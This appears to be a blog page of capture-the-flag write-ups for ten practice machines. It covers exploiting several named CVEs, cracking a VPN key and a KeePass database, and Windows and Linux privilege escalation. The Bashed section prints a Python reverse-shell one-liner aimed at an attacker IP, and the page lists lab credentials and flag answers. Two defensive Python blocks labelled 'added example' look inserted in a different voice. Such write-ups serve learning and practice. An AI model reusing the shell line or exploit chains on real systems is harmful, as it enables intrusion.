kami@kali:~$ journalctl
-
Expressway writeup
10.129.238.52
Scanned the machine with rustscan.


I found it strange that only SSH was open. I reran rustscan just in case and also scanned UDP ports.

I searched for exploits for OpenSSH 10.0p2 but could not find anything. Checked HackTricks for port 500/udp https://hacktricks.wiki/en/network-services-pentesting/ipsec-ike-vpn-pentesting.html. Looks like this has to do with an IPsec VPN. From the article, we can run ike-scan to get some information.

The ‘Auth=PSK’ means there is a VPN configured with a pre-shared key. Also, from the last line and the knowledge from HackTricks, the machine is configured for IPsec and is willing to perform IKE negotiation. We can do further fingerprinting with this, which will help us guess the VPN vendor.

We can capture the PSK hash next.

Then we need to crack it. I’ll use hashcat.


From the PSK it appears we also receive a user of ike@expressway.htb. Downloaded ikeforce and tried connecting but was having issues. So I was stuck here for a while trying to find out what I could do next. I got a hint, and this is something I need to ingrain in my brain: we have a user and a password. My thought was that these were for the VPN, but there can be password reuse. I tried it on SSH and it let us log in.

sudo -l gives us a weird prompt.

I tried the password we have and also spiderman, because for some reason I feel like #3 is a Spiderman reference. I don’t watch Marvel though lol sorry. This may be something useful to check out later.
/etc/shadow is not readable. /etc/passwd shows no other users. Checked the version of the machine, crontab, and network, and navigated around a few files. The sudo version is interesting.

Found this https://github.com/K1tt3h/CVE-2025-32463-POC. Read through the exploit; it’s small and nano is on the victim machine, so I just created exploit.sh and copied the code in. Ran it and we get root.


GG
-
Retro writeup
10.129.234.44
Scanned the target with rustscan.

Right off the bat this looks like an AD machine. Ran ldapsearch and we get some information back.



Ran enum4linux-ng and rpcclient but got no interesting results back. Tried querying user information but to no avail. Scanned users with kerbrute.

Also checked out SMB with smbclient. On Notes I had permission to connect but not to view files. On Trainees I found an important.txt.

Looks like that trainee account from earlier may have a brute-forceable password.

Ran kerbrute.

While that was running I just tried super simple passwords, and the creds are actually trainee:trainee. We can see things in the Notes share now.

Downloaded those. user.txt is the flag.

Earlier we also saw that banking account. Maybe that is brute-forceable or has super simple creds too. There’s also a Thomas and a James, and I assume they are tblack and jburley. Started my brute force on banking.

While that runs, since we have trainee’s credentials, we may be able to find more information in the environment now that we’re authenticated. Ran rpcclient, but it gave us information we already know.

Ran ldapdomaindump.

Read some of the output.


Important takeaways: banking is a computer account and not a user account. Also something to note is that Thomas and James have different permissions. Ran crackmapexec next with some simple credentials, and banking works too.

Ran impacket, but after it errored and I researched the error, it looks like the password needs to be changed.

I tried a few things but had no success. At this point I’ll just run BloodHound.

And after installing it on this machine for the first time, it actually crashed my computer. My computer isn’t great, so this is a sign that I’ll need to get a new device. I just went back to trying to reset the password. After a bit, impacket-changepasswd worked for me.

Now we can check for AD Certificate Services.

From the output, we find out we can request a certificate for another user with the ESC1 vulnerability.

With a lot of reading and talking to AI about next steps, I grabbed a certificate and authenticated with a new tool, certipy-ad. Then we add the trainee account to Domain Admins.

Used evil-winrm to get a shell and get root.txt.



GG
-
Sau writeup
10.129.229.26
Scanned the machine with rustscan.


Not entirely familiar with port 55555. It shows it’s a Golang HTTP server though. Navigated to it in a web browser.

On this site it looks like we can create a basket. When clicking create it gives us a token. Mine is: tK7SQ3xHZYOdGLHKChQ0v8VXO1CRciE03IgCyvysIY4y
Created the basket at /hjkom0j

I’m wondering if I can get a shell through the basket. Before putting more thought into that, I poked around more and found a version number at the bottom of the screen on another page.

Searchsploit didn’t show anything. I googled the version for exploits though, and it looks like there is an SSRF vulnerability. Here is a GitHub repo for an exploit https://github.com/Khalidhaimur/exploit-request-baskets-1.2.1. This code was actually built for this room, as seen in the readme, so hopefully this isn’t considered cheating. I downloaded this exploit, but it appears that it will just set up a forwarder and not give us any access. After poking around, if we play with the options of the basket we can point it at an internal webserver that has Maltrail v0.53 on it.

Googling an exploit for this I found this https://github.com/spookier/Maltrail-v0.53-Exploit. I don’t think I even need the original exploit now, I thought I’d have to chain them.
Set up a listener and used the exploit.

And we actually got a shell.

Submit User Flag –
A: 223cb50bc529e7b1dc781121489128bf
Looking for a quick win I ran sudo -l and this looks like it may be interesting.

As that only checks the status of the service running, eventually I checked the version of systemctl.

Googling it I found this exploit https://nvd.nist.gov/vuln/detail/CVE-2023-26604. This post was the easiest to read through and the most insightful in my opinion https://medium.com/%40zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7. Read through the post, followed it and got root.

Submit Root Flag –
A: 417c3049c5125d63d284c3355bd1e0b7

GG
-
Broker writeup
10.129.230.87
Scanned the machine with rustscan.


Navigated to the website but that errored out. I’m unfamiliar with these other ports so I’ll just go down the list. Found this for port 1883 https://hacktricks.wiki/en/network-services-pentesting/1883-pentesting-mqtt-mosquitto.html. I ran the first commands for MitM to see if I could hear anything from the box but didn’t get anything. This just shows what nmap already showed.

I didn’t expect this to actually work since I’m not in the middle of any two devices, just on the same network. At the bottom of HackTricks there is also mention of brokers, which is this box’s name. This unfortunately just looks useful for IoT networks, and I don’t yet know what else this machine is, so I’ll leave that behind for now.
I looked up what ActiveMQ was as I had seen it a few times already. It’s a webserver, but it also looks like there are some exploits out there even though I didn’t find a version yet. I found this https://github.com/rootsecdev/CVE-2023-46604. It also looks like there is a Metasploit module, so I found that.

I set my options, and I was actually having issues with this. I thought it’d make it simpler, but after some time I decided to just try this manually with the GitHub PoC.
I set up a listener.

Downloaded the poc-linux.xml file and hosted it on a webserver.

And ran the exploit.

And we’re in.


Submit User Flag –
A: 04d4c37dc4f96fbe080d9e7ed50f41ad
Ran sudo -l for quick wins.

nginx looks interesting. Checked out GTFOBins. It looks like we can upload files. Following the same pattern as other boxes, the root flag should be in /root/root.txt, and as this is running as root it would be allowed to read it. Made a temporary config file, and the server is on port 1337.

Called it, so it should be uploaded.

Then ran curl and we get root.txt

Submit Root Flag –
A: bf825aa7d3de7b4fcc8136fc4a0e961e

GG
-
Return writeup
10.129.95.241
Scanned the machine with rustscan.


We get a lot of information. Let’s check out the website first. It brings us to some admin panel.

Nothing interesting in source code or robots.txt. Will run ffuf while I check other things.

Interestingly, Kerberos and LDAP are on the machine. I checked out port 47001 but there’s no webserver there. Checked out the SMB ports. Anonymous login doesn’t connect.

On port 5985 I didn’t see any website either. No other possible low-hanging fruit. Since this looks like Active Directory, I’ll look at my AD notes. I’ll try an SMB relay first, as I recently learned this. My thought is that possibly there’s a printer service that may be talking and we can catch credentials.


Left this on for 5 minutes while I poked deeper at SMB to make sure I didn’t miss anything. Nothing.

I must need a domain account to interact. Let’s just start from the top and exhaust every port until I find something. I don’t think DNS will have anything, but I ran dig anyway.

Ffuf found an image directory earlier but access is denied there.

For Kerberos, I’m unfamiliar with anything we can do remotely to take advantage of it or enumerate. In my notes I saw some LDAP enumeration though, so I ran this.

We now know the domain is RETURN.local. This also looks to be a domain controller, printer.return.local. I need an account for further enumeration though.

I tried a brute force but that didn’t run at all. Started enum4linux but nothing from that either.

I was kind of confused about what was going on. The webpage was the only thing I had found, so I re-looked at it. I looked at the source code, but that wasn’t matching what I was seeing on my screen (because I had made the browser smaller). I realized when I fullscreened the website there were actually options I could interact with…

The only thing that looked interactive was Settings, and it looks like that points at an LDAP server. I updated the password to password.

smbclient still didn’t work. rpcclient neither.

I was reviewing notes and was a bit stuck here. Referred to a writeup. I didn’t think about this, but you can update the service address to our machine and listen on that port. That gives us credentials.


Return\svc-printer 1edFg43012!!
Attempting the rest myself. I tried the commands from before but authenticated this time. rpcclient worked this time.

Obviously we want the Administrator account. I assumed svc-printer is a low-level account, but I tried to change the password of the admin account and it didn’t work. Since we know that there’s only one machine and the privesc will be Administrator, I actually don’t think I can get more out of rpcclient after checking ‘help’. I tried playing with nxc but no luck there either. I was able to get in with evil-winrm though.

We can get the user flag.

Submit User Flag –
A: 9daec7eb00f2e3ef40e1006254593d75
We can see the root flag but not read it.

I haven’t used Evil-WinRM often, so I tried downloading it to my machine, but it still didn’t let me read it. Kind of silly, but you live and you learn. I ran net users, and actually that made me think admin may not be the target; it may be the Kerberos service. Checked cmdkey /list but nothing. Tried saved creds running cmd.exe. Can’t see scheduled tasks. I was able to make a /tmp directory and write a test file, so let’s see if I can get winPEAS over. Hosted an HTTP server and downloaded it.

This ended up not installing properly after taking a while. Instead of trying again, I want to look at other things first. Also, I realized certutil encodes before transfers, which makes the transfers longer, so I’ll look into using PowerShell instead in the future.
I tried Kerberoasting but no luck.

I don’t think I’ll get much with hacking AD, so I’ll move to just simple Windows local enumeration again. whoami /priv didn’t show much that I could take advantage of. whoami /groups looks like it might be interesting.

Printer Operators doesn’t look fun, but this Server Operators group looks like we might be able to get privilege escalation https://www.hackingarticles.in/windows-privilege-escalation-server-operator-group/. This article actually shows the same service that we have on our machine.

I’m going to follow the exploitation method 2. Created a shell with msfvenom.

We can just upload it with Evil-WinRM.

Updated the service and stopped it (you can ignore the screenshot, because I had stopped it previously). Set up a listener, then started it and we get SYSTEM.


Navigated to the flag.

Submit Root Flag –
A: b028d76da84b37bf5c7c436b2f5087d4

GG
-
Grandpa writeup
10.129.95.233
Scanned the machine with rustscan. It was hanging for a while though. When pinging, it wasn’t responding, but my nmap already had -Pn. It eventually went through, but there was only one port, which was HTTP.


Navigated to the webserver.

Nothing in robots.txt or source code. Kicked off ffuf.

While that ran I searchsploited the version of the IIS server, and it looks like there is a buffer overflow exploit https://www.exploit-db.com/exploits/41738. GitHub for the exploit here https://github.com/eliuha/webdav_exploit. This has to be run with Python 2. This unfortunately didn’t work.

It looks like this takes advantage of WebDAV. I knew I had some notes, so I tried further enumeration. I tried davtest but that failed.

There is a connection but the uploads failed. Instead I found a new GitHub repo that spawns a reverse shell using that vulnerability https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/tree/master. Read through and ran this code, and it worked.


Found the users that exist on the computer: Harry and Administrator.

I found a file on the All Users desktop that may be of interest.

I was having trouble moving this over to my machine. Instead I tried to download winPEAS.exe, but that failed.

Instead I just decided to do manual enumeration. Checked systeminfo first.

I googled exploits for the OS version and came across this https://www.exploit-db.com/exploits/35936. This looks like our privesc. After poking around, this looks like it has an msfconsole module. Looking back, I can also get a meterpreter shell instead. Since I’m having issues uploading manually, I decided to do that.

Booted up msfconsole.

I set my options and ran a check. It’s definitely vulnerable.

For some reason I got stuck, I referred to the writeup and they are actually using this same module. I reset my machine to see if it’s because I ran that exploit earlier. New IP is 10.129.1.210. It looks like that was the case because now I got a meterpreter shell.

Backgrounded the session, found the msfconsole version of this exploit by searching MS14-070, and set options.

Ran the exploit but it was failing; maybe this actually wasn’t the exploit. Ran the local_exploit_suggester module instead. Weird that it does show it’s vulnerable to that exploit, but I looked through others anyway.

ppr_flatten_rec looks to be the most promising, but with both exploits I keep getting “[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.”
I tried migrating to every service and nothing worked. All of msfconsole is not working. I even referred to MULTIPLE writeups using msfconsole, following their step-by-step guides, and it was not working for me. I’m starting over using the GitHub scripts instead. Got a shell as I did before. I won’t even bother explaining the rest, as this was one of the most frustrating machines I’ve done so far. I followed this through to the end of the box https://www.youtube.com/watch?v=SkwbylFcnZM. Apparently the updated msfconsole (since this box is older) stopped working with this machine, which made this box a lot more difficult.
Submit User Flag –
A: bdff5ec67c3cff017f2bedc146a5d869
Submit Root Flag –
A: 9359e905a2c35f861f6a57cecf28bb7b

-
Wifinetic writeup
10.129.229.90
Scanned the machine with rustscan.


Let’s check out FTP since anonymous login looks open. We can see a bunch of files.

Downloaded all the files to my machine. There’s an Employee Wellness file. Key takeaways: all_employees@wifinetic.htb, Samantha Wood/HR Manager/samantha.wood93@wifinetic.htb. There’s also a breadcrumb documentation file.

Key takeaways: management@wifinetic.htb, a migration from OpenWRT to Debian (possibly old config files with credentials that are reused), and another user, Oliver Walker/Wireless Network Administrator/olivia.walker17@wifinetic.htb. The last PDF doesn’t look very interesting. Extracted that backup file to review.

There’s a password file. Also, disregard the path of where these files are. I accidentally put them in a CVE folder I used for the last machine. I plan to delete all of this when I’m done, so I don’t care to move directories.

netadmin may be of use. Checked config files and there is a password in /config/wireless.

VeRyUniUqWiFIPasswrd1!
I tried this on root and netadmin over SSH, and we got in as netadmin.

Can’t run sudo -l for an easy win. Let’s get linpeas on the device. Also, we get user.txt.

Submit User Flag –
A: ad72f671b05d6d5772b8029d9d0e90d7
Also, while I was looking for a directory to put linpeas in, I found this interesting in /home.

/tmp is writable. Hosted an HTTP server and moved linpeas over to the victim machine.

No bash history, no cronjobs, no access to /etc/shadow. Looked for more backup files, passwords and scripts but no luck. Since this is a wifi-related box, I ran iwconfig and we do see wlan interfaces.


airodump-ng isn’t on the device. Not sure how I would actually take advantage of this, so I’ll poke around other places. Checked for SUID binaries but nothing there either.


It looks like reaver may be what we need. Attacking the BSSID of wlan0 we find credentials.


WhatIsRealAnDWhAtIsNot51121!
Tried this on root and we actually got in.

Submit Root Flag –
A: bfa1f75ef3493ef35a9019e0787410e0

GG
-
Netmon writeup
10.129.230.176
Scanned the machine with rustscan. Yesterday, when I was doing a different machine, rustscan missed scanning port 80, which threw me in the wrong direction and wasted 5 minutes. Today I’m dropping the batch size from 2000 to 500 to see how that treats me from now on.


Checked out ftp first since it looks like anonymous login is allowed.

We can already get user.txt.

Downloaded it to my machine.

Submit User Flag –
A: 3f52fbc996dd3b5accc5a5b2d44a0fb4
In that directory there were mentions of a website, which we saw on port 80. Navigated to the site.

Ran ffuf while I poked around further.

In the FTP there was an inetpub, but I don’t see any directories that I could use to upload files for a possible shell. I’ll keep that in the back of my mind though. Tried default credentials on the website, prtgadmin:prtgadmin, and a random assortment of simple credentials, but nothing worked. Searchsploit shows the only RCE is authenticated. This may be the path we need, but I do not have any credentials right now.

Found some configuration files that may be of use in C:\ProgramData\Paessler\PRTG Network Monitor\.

I found this in PRTG Configuration.old.bak.

So our admin target is definitely that prtgadmin. I ran CyberChef on that string that looks like a hash but didn’t get anything. I ran grep -i -A3 -B3 password PRTG* and it looks like we found a possible password.

PrTg@dmin2018
This didn’t work for logging into the site though. I tried checking out those other HTTP ports, 5985 and 47001, but they are Not Found. I couldn’t find anything else in the configuration files, so this find must be it. It’s likely just an outdated password, because it is an old configuration file. After playing around with different iterations, the password turned out to be PrTg@dmin2019. We already know the exploit; here’s a GitHub repo for it https://github.com/A1vinSmith/CVE-2018-9276. Downloaded the exploit and ran it.

And we’re already root so we can grab the flag.

Submit Root Flag –
A: f8cb106d6321e58d4fb22ea65d229bce

GG
-
Bashed writeup
10.129.1.43
Scanned the machine with rustscan.


Only port 80 looks open. Navigated to the webserver and ran ffuf while I poked around.


Nothing interesting in source code or robots.txt. Buttons don’t do anything, but navigating to the post we see a tool called phpbash that this user Arrexel created.

ffuf also found these directories.

/dev also refers to this phpbash.

Read through this guy’s GitHub. Looks like a more visually friendly webshell. When I clicked on phpbash.php it brought me to the shell.

We can get /etc/passwd.

I tried a bash one liner reverse shell but I didn’t get a connection.

We can get the user flag.
Submit User Flag –
A: d43ec80f31f8460336aa66b47eadb189
Let’s check out the scriptmanager user.

Can’t get into .bash_history and nothing else looks useful. Can’t su into scriptmanager. I also couldn’t get linpeas on the machine.

Poked around /var/www/html for passwords. No cronjobs. So the scriptmanager account is the only thing that looks like it will bring us closer to rooting the box; I think I need a way to get into that account. I tried a bunch of one-liners but that didn’t work. I got stuck for a while but eventually realized that we can write to the /uploads directory we saw earlier.

I tried making a test.php exploit using a PHP reverse shell, but it looks like it keeps failing as it doesn’t take the input properly. Since this directory is writable though, I was able to transfer the file over from my machine.

This failed too though when I tried calling it, because for some reason it changed the content of test2.php.

I realized my script was bad; I re-grabbed it off of pentestmonkey and put in my port and IP. Downloaded it on the victim machine, but uploads looks to be static and didn’t execute it.

I got stuck here so I referred to a writeup. I’m not sure why none of mine worked, but this command did.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.157",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Put this in my notes for later use.

Finally got a shell. We can now move over to scriptmanager.

Navigated to his directory but didn’t see anything.

After running through my Linux local enumeration notes again, there’s a directory in / called scripts that this user has access to.

It looks like test.py created test.txt. I checked crontabs but saw nothing. Weirdly though, the date and time on test.txt changed from when I first looked at it, so something must be interacting with it. Wrote a shell and set up a listener.
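For the defender’s side of this privesc, here is an added example (my own, not code from the writeup or the box) that audits /etc/crontab-style entries for programs, or their parent directories, that a non-root user can modify, which is the condition a root job running scripts out of a low-privilege user’s directory creates. It also handles per-user crontabs via a flag; demo() constructs a throwaway directory tree and a made-up crontab, so every path and mode in it is an assumption.

```python
"""Find cron jobs whose program (or its directory) a non-root user can change.

Added example, not code from the original writeup.  It parses crontab text in
the /etc/crontab layout (schedule, user, command), takes every absolute path on
the command line, and flags any such file, or its parent directory, that is
group/world writable or owned by an untrusted uid.  demo() builds a throwaway
tree so the check runs without touching the real system.
"""
from __future__ import annotations

import os
import shlex
import shutil
import stat
import tempfile


def crontab_entries(text: str, system_crontab: bool = True):
    """Yield (user, command) from crontab text; skips comments and VAR=... lines.

    system_crontab=True is the /etc/crontab layout with a user column;
    a per-user crontab (crontab -l) has no user column.
    """
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split(None, 1)[0]:
            continue
        n_sched = 1 if line.startswith("@") else 5        # @daily style or 5 fields
        n_fields = n_sched + (1 if system_crontab else 0) + 1
        parts = line.split(None, n_fields - 1)
        if len(parts) < n_fields:
            continue
        user = parts[n_sched] if system_crontab else "(crontab owner)"
        yield user, parts[-1]


def writable_by_untrusted(path: str, trusted_uids=(0,)) -> bool:
    """True if group/world can write path or its owner is not a trusted uid."""
    st = os.stat(path)
    return st.st_uid not in trusted_uids or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_cron(text: str, system_crontab: bool = True, trusted_uids=(0,)) -> list[str]:
    """Return one finding per cron entry whose program or its directory is modifiable."""
    findings = []
    for user, command in crontab_entries(text, system_crontab):
        try:
            tokens = shlex.split(command)
        except ValueError:          # unbalanced quotes; nothing sensible to check
            continue
        # Relative names depend on cron's PATH, so only absolute paths are checked.
        for tok in (t for t in tokens if t.startswith("/") and os.path.isfile(t)):
            for target in (tok, os.path.dirname(tok)):
                if writable_by_untrusted(target, trusted_uids):
                    findings.append(f"{user} runs {tok}, but {target} is writable by an untrusted user")
    return findings


def demo() -> list[str]:
    """Build a CONSTRUCTED tree (one writable dir, one writable file, one clean job) and audit it."""
    root = tempfile.mkdtemp()
    try:
        for sub in ("scripts", "bin", "safe"):
            os.makedirs(f"{root}/{sub}")
        for rel, mode in (("scripts/test.py", 0o644), ("bin/cleanup.sh", 0o777), ("safe/backup.sh", 0o755)):
            with open(f"{root}/{rel}", "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(f"{root}/{rel}", mode)
        os.chmod(f"{root}/scripts", 0o777)   # anyone can drop a script here: the /scripts situation
        os.chmod(f"{root}/bin", 0o755)
        os.chmod(f"{root}/safe", 0o755)
        crontab = (
            "# CONSTRUCTED sample in /etc/crontab layout\n"
            "PATH=/usr/local/bin:/usr/bin:/bin\n"
            f"* * * * * root {root}/scripts/test.py\n"
            f"*/5 * * * * root {root}/bin/cleanup.sh\n"
            f"0 2 * * * root {root}/safe/backup.sh --quiet\n"
            f"@reboot root {root}/safe/backup.sh\n"
        )
        # The demo files are owned by the current user, so treat that uid as trusted too.
        return audit_cron(crontab, trusted_uids=(0, os.getuid()))
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```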

And we got in.

Submit Root Flag –
A: 0c5afeef47fe766b6f062818f2e6ed60

GG
-
Keeper writeup
10.129.229.41
Scanned the machine with rustscan.


Navigating to the webserver we see this.

Added tickets.keeper.htb and keeper.htb to /etc/hosts. Navigated to the new site.

Searchsploited ‘request tracker’.

Running a directory busting scan first with ffuf.

Also tried default creds first. Found this and tried root:password. https://itnixpro.com/reset-default-root-password-on-request-tracker-rt/. Weirdly, when I try a password that doesn’t work I get an error, but when I tried root:password it didn’t log me in and I didn’t get an error.
Reading through the exploit here https://www.exploit-db.com/exploits/38459. This mentioned 4.0.10, but other versions may be vulnerable. I’m not completely confident this is the exploit.
While ffuf was still running I was checking out the other directories. /m looked like a mobile version; tried some default creds. /l didn’t go anywhere, but for some reason in /rt the default creds of root:password got me in.


Poking around the site, there is a user search. I couldn’t pull anything after attempting some SQL injection though.

Something that may be interesting is a recently reviewed ticket.

Looks like someone was having an issue with KeePass and it’s in this guy’s home directory.

I have seen KeePass clients, as it’s a sort of legacy password manager/file. It also might be good to note this guy’s name: lnorgaard (Lise Norgaard).
Also got this, which may be interesting.

Not sure how easy his password might be, but I’ll start a brute force on SSH.

Right after I did this I clicked on his username, and actually it’s just in the comments.

SSHed in and it worked.


Submit User Flag –
A: 0b17aab03ba2c0de88d7be575a824b05
My assumption is this zip file is the KeePass file, and it is.

So when I have used KeePass in my life so far, it’s just been password protected and on Windows. I’m unsure how to interact with a KeePass file on Linux and how we can crack this. Did a bit of googling. Looks like john will help us https://github.com/patecm/cracking_keepass. Downloaded the file to my machine.

Tried cracking with john but that was taking forever, so I kind of figured that probably wasn’t the goal. I let john run while I looked for other things though.

After a bunch of googling I found this https://nvd.nist.gov/vuln/detail/CVE-2023-32784. When googling this exploit, unfortunately I saw a writeup, so this must be the correct path. I found this https://github.com/vdohney/keepass-password-dumper. Looks like we’ll actually be taking advantage of the .dmp that showed up when extracting the .zip. Unfortunately this is for Windows though. Found this Python tool we can use instead https://github.com/z-jxy/keepass_dump/tree/main. Downloaded the Python exploit and ran it.

No idea what that string of text was, but when I googled it, it was some sort of recipe.

Maybe Rødgrød med fløde is this dude’s KeePass password?

Installed KeePass on my machine. For whatever reason, I couldn’t copy and paste that password into the GUI. I don’t really want this on my computer; I’d rather have a CLI tool, so I looked for that. There’s a tool called keepassxc, but I had trouble with it. I was able to find kpcli instead.

I tried the recipe with a capital R, but the password rødgrød med fløde got me in.

Poked around these directories and was able to find a username and password for root.

It looks like a PuTTY key, but I checked if I can log in with the username and password and got permission denied.

Since this box is Linux we would need to convert it. After some googling I found some commands to do so. Had to download putty-tools too.

It wasn’t working, but it turns out my formatting was off. It has to look like this.
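Since the screenshot of the correctly laid-out key is missing from this post, here is an added example (mine, not from the writeup or from PuTTY) of a small Python checker that verifies a pasted .ppk file has the line structure puttygen expects: the PuTTY-User-Key-File header, Encryption and Comment lines, Public-Lines and Private-Lines blocks whose counts match the base64 lines that follow, and a closing Private-MAC line. The embedded sample is constructed filler, not a real key.

```python
"""Layout check for a PuTTY .ppk file before handing it to puttygen.

Added example, not code from the original writeup.  A .ppk pasted out of a
ticket or a terminal often loses its line structure and puttygen rejects it.
This checker verifies the header line, the Encryption and Comment lines, that
the Public-Lines and Private-Lines counts match the base64 lines that follow,
and that a Private-MAC line closes the file.  Key material is not parsed, and
the sample below is CONSTRUCTED filler, not a real key.
"""
from __future__ import annotations

import re

HEADER_RE = re.compile(r"^PuTTY-User-Key-File-(\d): (\S+)$")
B64_RE = re.compile(r"[A-Za-z0-9+/=]+")


def check_ppk(text: str) -> list[str]:
    """Return the layout problems found; an empty list means the layout is sane."""
    lines = text.strip().splitlines()
    if not lines:
        return ["empty file"]
    m = HEADER_RE.match(lines[0])
    if not m:
        return [f"first line is not a PuTTY-User-Key-File header: {lines[0][:60]!r}"]
    problems: list[str] = []
    if int(m.group(1)) not in (2, 3):
        problems.append(f"unexpected PPK version {m.group(1)}")
    idx = 1
    # Fixed header fields. (An encrypted v3 key also carries Key-Derivation
    # lines here, which this simple checker does not model.)
    for field in ("Encryption", "Comment"):
        if idx >= len(lines) or not lines[idx].startswith(field + ":"):
            problems.append(f"missing or misplaced '{field}:' line at line {idx + 1}")
            return problems
        idx += 1
    # Two counted blocks: Public-Lines, then Private-Lines.
    for field in ("Public-Lines", "Private-Lines"):
        if idx >= len(lines) or not lines[idx].startswith(field + ":"):
            problems.append(f"missing '{field}:' line at line {idx + 1}")
            return problems
        try:
            count = int(lines[idx].split(":", 1)[1])
        except ValueError:
            problems.append(f"'{field}:' count is not a number")
            return problems
        idx += 1
        block = lines[idx:idx + count]
        if len(block) != count:
            problems.append(f"{field} says {count} lines but only {len(block)} follow")
            return problems
        for n, b64 in enumerate(block, start=1):
            if not B64_RE.fullmatch(b64):
                problems.append(f"{field} line {n} is not a bare base64 line")
        idx += count
    if idx >= len(lines) or not lines[idx].startswith("Private-MAC:"):
        problems.append("missing 'Private-MAC:' line after the private block")
    return problems


# CONSTRUCTED sample with the correct layout; the base64 is filler, not a key.
GOOD_PPK = """PuTTY-User-Key-File-2: ssh-rsa
Encryption: none
Comment: rsa-key-CONSTRUCTED
Public-Lines: 2
AAAAB3NzaC1yc2EAAAADAQABAAAAgQ
CONSTRUCTEDPUBLICLINE==
Private-Lines: 2
CONSTRUCTEDPRIVATELINEONE
CONSTRUCTEDPRIVATELINETWO==
Private-MAC: 0123456789abcdef0123456789abcdef01234567
"""

# The same key after a sloppy paste joined the two public lines into one.
MERGED_PPK = GOOD_PPK.replace("AAAAgQ\nCONSTRUCTEDPUBLICLINE==", "AAAAgQCONSTRUCTEDPUBLICLINE==")

# Everything on one line, as it comes out when copied from a narrow terminal.
ONE_LINE_PPK = " ".join(GOOD_PPK.split())

if __name__ == "__main__":
    for name, sample in (("good", GOOD_PPK), ("merged", MERGED_PPK), ("one-line", ONE_LINE_PPK)):
        print(name, "->", check_ppk(sample) or "OK")
```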

And we’re in.

Submit User Flag –
A: 69885cdba143fb83e632ae65eb7e699d

GG